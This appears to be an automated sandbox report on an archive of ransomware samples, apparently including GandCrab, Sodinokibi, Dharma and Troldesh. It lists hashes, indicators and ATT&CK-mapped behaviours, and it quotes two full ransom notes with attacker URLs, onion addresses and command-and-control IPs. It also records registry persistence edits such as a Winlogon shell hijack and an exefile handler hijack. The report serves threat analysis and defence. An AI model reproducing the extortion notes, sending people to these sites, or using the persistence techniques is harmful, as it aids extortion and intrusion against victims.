andromeda | 81dd2aed2ac6ca4f819a7736d4aa4c00e76d89045bf9ce70f2359e68321fc664

Analysis

max time kernel
162s
max time network
293s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
05-11-2024 22:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RNSM00371.7z
Size

8.1MB
MD5

ee791e896c5058c5d4a12cad2d279a85
SHA1

6cb48708979a25e8a12eca2a32b2d9fbe5b15a67
SHA256

81dd2aed2ac6ca4f819a7736d4aa4c00e76d89045bf9ce70f2359e68321fc664
SHA512

12a37dd2bec8b9e7bc869eb6b928d42dc678bbbd5482eaae7f90c24d1b3b97500aefbe291d3f26125c4d10ebeb0f95cd4e9874944d429bd6c5f4e99d6f745d7c
SSDEEP

196608:tqjKf+U5zlOvOVF9GLCNOopBvEQ2G0mRYjb6p+UP+x8vYY:ksROSPaK2xmSjY1PVt

Malware Config

Extracted

Path

C:\$Recycle.Bin\{RecOveR}-bthbh__.Txt

Ransom Note

:2*70;5)(2&1 38#<$/5.#9"9#88+&; :2*70;5)(2&1 38#<$/5.#9"9#88+&; :2*70;5)(2&1 38#<$/5.#9"9#88+&; :2*70;5)(2&1 38#<$/5.#9"9#88+&; NOT YOUR LANGUAGE? USE https://translate.google.com What's the matter with your files? Your data was secured using a strong encryption with RSA4096. Use the link down below to find additional information on the encryption keys using RSA-4096 https://en.wikipedia.org/wiki/RSA_(cryptosystem) What exactly that means? :2*70;5)(2&1 38#<$/5.#9"9#88+&; :2*70;5)(2&1 38#<$/5.#9"9#88+&; It means that on a structural level your files have been transformed . You won't be able to use , read , see or work with them anymore . In other words they are useless , however , there is a possibility to restore them with our help . What exactly happened to your files ??? *** Two personal RSA-4096 keys were generated for your PC/Laptop; one key is public, another key is private. *** All your data and files were encrypted by the means of the public key , which you received over the web . *** In order to decrypt your data and gain access to your computer you need a private key and a decryption software, which can be found on one of our secret servers. :2*70;5)(2&1 38#<$/5.#9"9#88+&; :2*70;5)(2&1 38#<$/5.#9"9#88+&; What should you do next ? There are several options for you to consider : *** You can wait for a while until the price of a private key will raise, so you will have to pay twice as much to access your files or *** You can start getting BitCoins right now and get access to your data quite fast . In case you have valuable files , we advise you to act fast as there is no other option rather than paying in order to get back your data. In order to obtain specific instructions , please access your personal homepage by choosing one of the few addresses down below : http://h3ds4.maconslab.com/3F8B8F4801BB825 http://aq3ef.goimocoa.at/3F8B8F4801BB825 http://fl43s.toabolt.at/3F8B8F4801BB825 If you can't access your personal homepage or the addresses are not working, complete the following steps: *** Download TOR Browser - http://www.torproject.org/projects/torbrowser.html.en *** Install TOR Browser and open TOR Browser *** Insert the following link in the address bar: xzjvzkgjxebzreap.onion/3F8B8F4801BB825 :2*70;5)(2&1 38#<$/5.#9"9#88+&; :2*70;5)(2&1 38#<$/5.#9"9#88+&; :2*70;5)(2&1 38#<$/5.#9"9#88+&; ***************IMPORTANT*****************INFORMATION******************** Your personal homepages http://h3ds4.maconslab.com/3F8B8F4801BB825 http://aq3ef.goimocoa.at/3F8B8F4801BB825 http://fl43s.toabolt.at/3F8B8F4801BB825 Your personal homepage Tor-Browser xzjvzkgjxebzreap.onion/3F8B8F4801BB825 Your personal ID 3F8B8F4801BB825 :2*70;5)(2&1 38#<$/5.#9"9#88+&; :2*70;5)(2&1 38#<$/5.#9"9#88+&; :2*70;5)(2&1 38#<$/5.#9"9#88+&;

URLs

http://h3ds4.maconslab.com/3F8B8F4801BB825

http://aq3ef.goimocoa.at/3F8B8F4801BB825

http://fl43s.toabolt.at/3F8B8F4801BB825

http://xzjvzkgjxebzreap.onion/3F8B8F4801BB825

Extracted

Family

urelas

1.234.83.146

133.242.129.155

218.54.31.226

218.54.30.235

218.54.31.165

Extracted

Path

C:\Recovery\05jyk078zz_Wannadie.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 05jyk078zz. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A77D2D0777BB9BF9 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/A77D2D0777BB9BF9 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: kjVesNZgNe7WlLS5+SELBJPxrJkyt7HR35zNF9E6sO6XaWR65TunhXv6yAv8mvoo e/36yU7jGwx3tk1WWCyuruBtdAfknIRW5RnkaGRLZ1Rsl76GrSl6cP7ESRzu9JFr MEYS35VZvX7lH2mu3nk8qNXjQz1Dy26s19raJ4toFx6t1pATVxPq/txkj19lTWNz ulOuEdrNLWYStruEOpKNyzViV//hih/klXKCu/cIKsBSeniJ4dCguvWSEorL/iZ3 l1ehf+ZGUw5dOkuS1h7TCcKa3+GORVgOguOf5HYIG6yDYFW6ZINjNCEzTY91hyCb VXFfnl2ZZKdRuOxn/9Uo15pcs7vnuG7URtMiGVo2zhbNiaL0C6HnTSfAg8z4NT7B fH/1a2j6dab1Kg94dTRluJCoPYzvVkeE2/UCKStVk3sMTTuO5gRsXWkCzENQLM2r jUL+EepMhaLJa2hPgHiD7mk7Ta6KyjOVAP62faPIyEWGg+OV7kR5xKTfZ5osWa1y 5DPK4a77i2PsxWqHUFCf8CrZ/qPwU79iU4gRFwPkduswqgYLUYhX3v6XN5+hjgS6 kC/Xnzdu2aVJ4D8H0qgn6UOrO2DSf4He39finpP3cAsre9PbPIbivjOX4fH+6a+y 34qT48QzdifA/1k0blIF/RxiAUuAoz6svPDeUU72hXOoxjNf04g9POdvPoKsJUT7 Kr/pw8fbtWi69bAZAW0LwnfKws7zFh5hf79mjZr9LeIfZrMoDffxnKpAwwI/9uvS +knqg3COSyfnuxsh0OuRiNoLydPMOaOFERgEjq9HppbXcuWANHCO74jKgDkIVdCF gl8LqL3+E6wJjjJKXzYvFSvniIZwjQOo+OunMYTSq2/lfMgl/tPSkRKrn8/ypnHM wQIA49v/4SiWKl3Rg/T68C6LsjOJvig+NOGK16eq1TKDZIRkiacuXW8uox2IoUDI 9clzqPPrW3gq8hErJ3L2qSft2njaim9p0kH0I0buVZWkdx6m3o14ST9ghitdXl29 QRmsbesWWApNDUk/z4gbXM4ygOjYUv3e0ikZF1FM5WxcGz8LdW8mcPtOiwsm3BHI bIph/ESHGgrMbl6pFqFLGUEMf8fAyc8PBqiPrbLIfYIspejMvH6FcQf8KrGL3ecv oPlWyDUOqSImzm8frsZwFHLq+a9MqecUhS/i76IttLn1FVZK6sQ6BfbQPyFM7nez 7eh/sKN7BK/yeF9y2T8tF8On1OkxmbV9hJo= Extension name: 05jyk078zz ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A77D2D0777BB9BF9

http://decryptor.top/A77D2D0777BB9BF9

Signatures

Andromeda family
andromeda
Andromeda, Gamarue
Andromeda, also known as Gamarue, is a modular botnet malware primarily used for distributing other types of malware and it's written in C++.
botnet backdoor andromeda

Detects Andromeda payload. 3 IoCs

resource	yara_rule
behavioral1/memory/9244-9815-0x0000000000400000-0x0000000000409000-memory.dmp	family_andromeda
behavioral1/memory/9244-9813-0x0000000000400000-0x0000000000409000-memory.dmp	family_andromeda
behavioral1/memory/9276-11117-0x00000000003F0000-0x00000000003F5000-memory.dmp	family_andromeda

Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
ransomware dharma
Dharma family
dharma

GandCrab payload 2 IoCs

resource	yara_rule
behavioral1/memory/5052-158-0x00000000020A0000-0x00000000020B7000-memory.dmp	family_gandcrab
behavioral1/memory/5052-154-0x0000000000400000-0x000000000045F000-memory.dmp	family_gandcrab

Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
ransomware backdoor gandcrab
Gandcrab family
gandcrab

Modifies WinLogon for persistence 2 TTPs 3 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,"	Trojan-Ransom.Win32.Blocker.itys-752faacdb6a477e6b45de1b6e1f2e756dd9a2f3d1a8d6294c11a1c46dd98f611.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe HelpMe.exe"	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe"	Trojan-Ransom.Win32.Blocker.itys-752faacdb6a477e6b45de1b6e1f2e756dd9a2f3d1a8d6294c11a1c46dd98f611.exe

Modifies firewall policy service 3 TTPs 7 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\authorizedapplications\list\C:\Windows\system32\inf\svchost.exe = "C:\\Windows\\system32\\inf\\svchost.exe:*:Enabled:@xpsp2res.dll,-22001"	svchost.exe
Key created	\REGISTRY\MACHINE\system\controlset001\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list	Trojan-Ransom.Win32.Blocker.bzbf-a522c378bbfa4fb5d09bc79f41413ca297823f8253af592187104ca95e664090.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\standardprofile	Trojan-Ransom.Win32.Blocker.bzbf-a522c378bbfa4fb5d09bc79f41413ca297823f8253af592187104ca95e664090.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\authorizedapplications	Trojan-Ransom.Win32.Blocker.bzbf-a522c378bbfa4fb5d09bc79f41413ca297823f8253af592187104ca95e664090.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\authorizedapplications\list	Trojan-Ransom.Win32.Blocker.bzbf-a522c378bbfa4fb5d09bc79f41413ca297823f8253af592187104ca95e664090.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\authorizedapplications\list\C:\Windows\system32\inf\svchost.exe = "C:\\Windows\\system32\\inf\\svchost.exe:*:Enabled:@xpsp2res.dll,-22001"	Trojan-Ransom.Win32.Blocker.bzbf-a522c378bbfa4fb5d09bc79f41413ca297823f8253af592187104ca95e664090.exe
Key created	\REGISTRY\MACHINE\system\controlset001\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list	svchost.exe

Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Trojan-Ransom.Win32.PornoAsset.dggw-f0c7d7525fdd13a49730e5cef8d6ea3d95361dbd439082c2c0701139460fa708.exe#$.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	Trojan-Ransom.Win32.PornoAsset.dggw-f0c7d7525fdd13a49730e5cef8d6ea3d95361dbd439082c2c0701139460fa708.exe#$.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Sodinokibi family
sodinokibi
Troldesh family
troldesh
Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.
ransomware trojan troldesh
Urelas
Urelas is a trojan targeting card games.
trojan urelas
Urelas family
urelas
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (566) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\39929 = "C:\\PROGRA~3\\LOCALS~1\\Temp\\ccwtmod.bat"	svchost.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\drivers\spools.exe	Trojan-Ransom.Win32.Blocker.itys-752faacdb6a477e6b45de1b6e1f2e756dd9a2f3d1a8d6294c11a1c46dd98f611.exe
File opened for modification	C:\Windows\SysWOW64\drivers\spools.exe	Trojan-Ransom.Win32.Blocker.itys-752faacdb6a477e6b45de1b6e1f2e756dd9a2f3d1a8d6294c11a1c46dd98f611.exe

Sets service image path in registry 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Schedule\ImagePath = "C:\\Windows\\system32\\drivers\\spools.exe"	spools.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Schedule\ImagePath = "C:\\Windows\\system32\\drivers\\spools.exe"	Trojan-Ransom.Win32.Blocker.itys-752faacdb6a477e6b45de1b6e1f2e756dd9a2f3d1a8d6294c11a1c46dd98f611.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Schedule\ImagePath = "C:\\Windows\\system32\\drivers\\spools.exe"	spools.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Schedule\ImagePath = "C:\\Windows\\system32\\drivers\\spools.exe"	spools.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Schedule\ImagePath = "C:\\Windows\\system32\\drivers\\spools.exe"	spools.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Schedule\ImagePath = "C:\\Windows\\system32\\drivers\\spools.exe"	spools.exe

Checks computer location settings 2 TTPs 16 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.Win32.Bitman.vho-67050ba69d0531459e14b74d23c29f0691330b5b020097e4167cb22311077748.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	y_installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	explorer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	browser.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	browser.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.Win32.Bitman.pef-44ebaf4e63fff8d32b82f43078b4a786052d0a7b1cb4c82e491c10099df3e7d8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	browser.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	wsmprovhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	service_update.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	Trojan-Ransom.Win32.GenericCryptor.cys-9609617aa62f273421ff86aadac855bbe646c3cf2d033f9d2d08703a9f12b55b.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	Yandex.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	Trojan-Ransom.Win32.GenericCryptor.czx-059fa23ca857d36c68ce1e703580e91cbdea95dca01b807bdd14b316bf75f685.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	browser.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	browser.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.MSIL.Crusis.gen-e0f40f3c8d4c3799fec048acc0ced8270563378a621a8762c5ff4ecc21af8292.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 11 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptions instructions.txt	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryption instructions.jpg	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe

Executes dropped EXE 64 IoCs

pid	Process
768	HEUR-Trojan-Ransom.MSIL.Crusis.gen-e0f40f3c8d4c3799fec048acc0ced8270563378a621a8762c5ff4ecc21af8292.exe
1776	HEUR-Trojan-Ransom.Win32.Bitman.pef-44ebaf4e63fff8d32b82f43078b4a786052d0a7b1cb4c82e491c10099df3e7d8.exe
4856	HEUR-Trojan-Ransom.Win32.Bitman.vho-67050ba69d0531459e14b74d23c29f0691330b5b020097e4167cb22311077748.exe
2216	HEUR-Trojan-Ransom.Win32.Encoder.gen-34b0dc15655965a488415da87322be5aa9625d6ade8374765b6a311fc989bbdf.exe
5052	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-1a9f6f4967284cd122ee3447eac174f4513103b88b8364a698866eea4a7f773b.exe
2736	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
2420	HEUR-Trojan-Ransom.Win32.Shade.gen-b89ae460c4a36180e3fe0e578e5f36354c438ae36324beaeef889ff69425653b.exe
2724	wsmprovhost.exe
4612	wsmprovhost.exe
3388	Trojan-Ransom.Win32.Bitman.afoy-d4b908f9c294902196657c7b566046f058b2b58a63cfa49abf85e9e300bb8f14.exe
4528	y_installer.exe
3392	YandexPackSetup.exe
3540	y_installer.exe
4520	lite_installer.exe
1064	seederexe.exe
5368	Yandex.exe
5508	explorer.exe
5688	sender.exe
6412	{1F5F82BF-2B79-4090-98DD-024B258A832C}.exe
8532	Trojan-Ransom.Win32.Blocker.bzbf-a522c378bbfa4fb5d09bc79f41413ca297823f8253af592187104ca95e664090.exe
8488	svchost.exe
8456	Trojan-Ransom.Win32.Blocker.gpjb-9aaa3d6cd47171f08169c6f96f721ae1820b655393f3410aa31891c133e0d015.exe
8412	Trojan-Ransom.Win32.Blocker.itys-752faacdb6a477e6b45de1b6e1f2e756dd9a2f3d1a8d6294c11a1c46dd98f611.exe
8388	Trojan-Ransom.Win32.Blocker.iwia-f871ed8e69348e9deb8384dbd6cbc2591826f7a92b88014d2e399ecdb78f91fd.exe
9100	spools.exe
9244	Trojan-Ransom.Win32.Blocker.gpjb-9aaa3d6cd47171f08169c6f96f721ae1820b655393f3410aa31891c133e0d015.exe
9352	spools.exe
9348	spools.exe
9372	spools.exe
9388	spools.exe
9424	spools.exe
7060	spools.exe
6644	spools.exe
9920	spools.exe
10984	spools.exe
7560	spools.exe
7920	spools.exe
5856	Trojan-Ransom.Win32.Blocker.jaxq-55417d50410b3fd4d320cde93d52ed939ca46846f764d0bf56228cdb3992d9a0.exe
5844	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5948	Trojan-Ransom.Win32.GandCrypt.bvu-530779b0c9039c984af2c9f625da1ce89dc59fb4c923cf377781e035d6dac58c.exe
5996	Trojan-Ransom.Win32.GandCrypt.jdv-bfe57e23766e9709df6e275a6f4eb3dd841882c8b155398911491a99dde77732.exe
5960	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
6008	Trojan-Ransom.Win32.GandCrypt.jes-02d9a0751c2695ce9962f9658409f59a8aab0657d1629c9f688c10dbe7dae485.exe
6016	Trojan-Ransom.Win32.GandCrypt.pf-0d777c05c330e188396ca09e7d5fc33707cfa35fd1f4296236290a856863d6ce.exe
6032	Trojan-Ransom.Win32.Foreign.oifc-e70d17459b65c266bd5c8eefc2e76b2c2709bf629e01e71c27d09382ac18dc3e.exe
5928	Trojan-Ransom.Win32.GandCrypt.jhu-2c442eba1098b401f2209d9c3434abeb472f635bed8e25c44d33a5f12b65c8c6.exe
6040	Trojan-Ransom.Win32.Foreign.oifc-e70d17459b65c266bd5c8eefc2e76b2c2709bf629e01e71c27d09382ac18dc3e.exe
5816	ybF20C.tmp
6196	spools.exe
9052	setup.exe
6384	spools.exe
6324	spools.exe
6284	spools.exe
6340	setup.exe
8204	setup.exe
8932	spools.exe
8948	spools.exe
1036	Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
9568	Trojan-Ransom.Win32.GenericCryptor.cys-9609617aa62f273421ff86aadac855bbe646c3cf2d033f9d2d08703a9f12b55b.exe
8624	Trojan-Ransom.Win32.GenericCryptor.czx-059fa23ca857d36c68ce1e703580e91cbdea95dca01b807bdd14b316bf75f685.exe
8540	Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
9108	spools.exe
9164	Trojan-Ransom.Win32.Sodin.aas-ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe

Loads dropped DLL 55 IoCs

pid	Process
2216	HEUR-Trojan-Ransom.Win32.Encoder.gen-34b0dc15655965a488415da87322be5aa9625d6ade8374765b6a311fc989bbdf.exe
2216	HEUR-Trojan-Ransom.Win32.Encoder.gen-34b0dc15655965a488415da87322be5aa9625d6ade8374765b6a311fc989bbdf.exe
2216	HEUR-Trojan-Ransom.Win32.Encoder.gen-34b0dc15655965a488415da87322be5aa9625d6ade8374765b6a311fc989bbdf.exe
2216	HEUR-Trojan-Ransom.Win32.Encoder.gen-34b0dc15655965a488415da87322be5aa9625d6ade8374765b6a311fc989bbdf.exe
2216	HEUR-Trojan-Ransom.Win32.Encoder.gen-34b0dc15655965a488415da87322be5aa9625d6ade8374765b6a311fc989bbdf.exe
2216	HEUR-Trojan-Ransom.Win32.Encoder.gen-34b0dc15655965a488415da87322be5aa9625d6ade8374765b6a311fc989bbdf.exe
2216	HEUR-Trojan-Ransom.Win32.Encoder.gen-34b0dc15655965a488415da87322be5aa9625d6ade8374765b6a311fc989bbdf.exe
2216	HEUR-Trojan-Ransom.Win32.Encoder.gen-34b0dc15655965a488415da87322be5aa9625d6ade8374765b6a311fc989bbdf.exe
3912	MsiExec.exe
3912	MsiExec.exe
3912	MsiExec.exe
3912	MsiExec.exe
3912	MsiExec.exe
3912	MsiExec.exe
3912	MsiExec.exe
3912	MsiExec.exe
3912	MsiExec.exe
3912	MsiExec.exe
11336	browser.exe
7012	browser.exe
11336	browser.exe
8132	browser.exe
8132	browser.exe
8904	browser.exe
6044	browser.exe
8904	browser.exe
6044	browser.exe
10972	browser.exe
10972	browser.exe
8132	browser.exe
8132	browser.exe
8132	browser.exe
8132	browser.exe
8132	browser.exe
2476	browser.exe
2476	browser.exe
8556	browser.exe
8556	browser.exe
6796	browser.exe
6796	browser.exe
11276	browser.exe
8580	browser.exe
11276	browser.exe
8580	browser.exe
8456	browser.exe
8208	browser.exe
8208	browser.exe
8456	browser.exe
7672	browser.exe
11528	browser.exe
7672	browser.exe
8960	browser.exe
1404	browser.exe
8960	browser.exe
1404	browser.exe

Modifies system executable filetype association 2 TTPs 6 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\SysWow64\\drivers\\spools.exe \"%1\" %*"	spools.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\SysWow64\\drivers\\spools.exe \"%1\" %*"	spools.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\SysWow64\\drivers\\spools.exe \"%1\" %*"	spools.exe
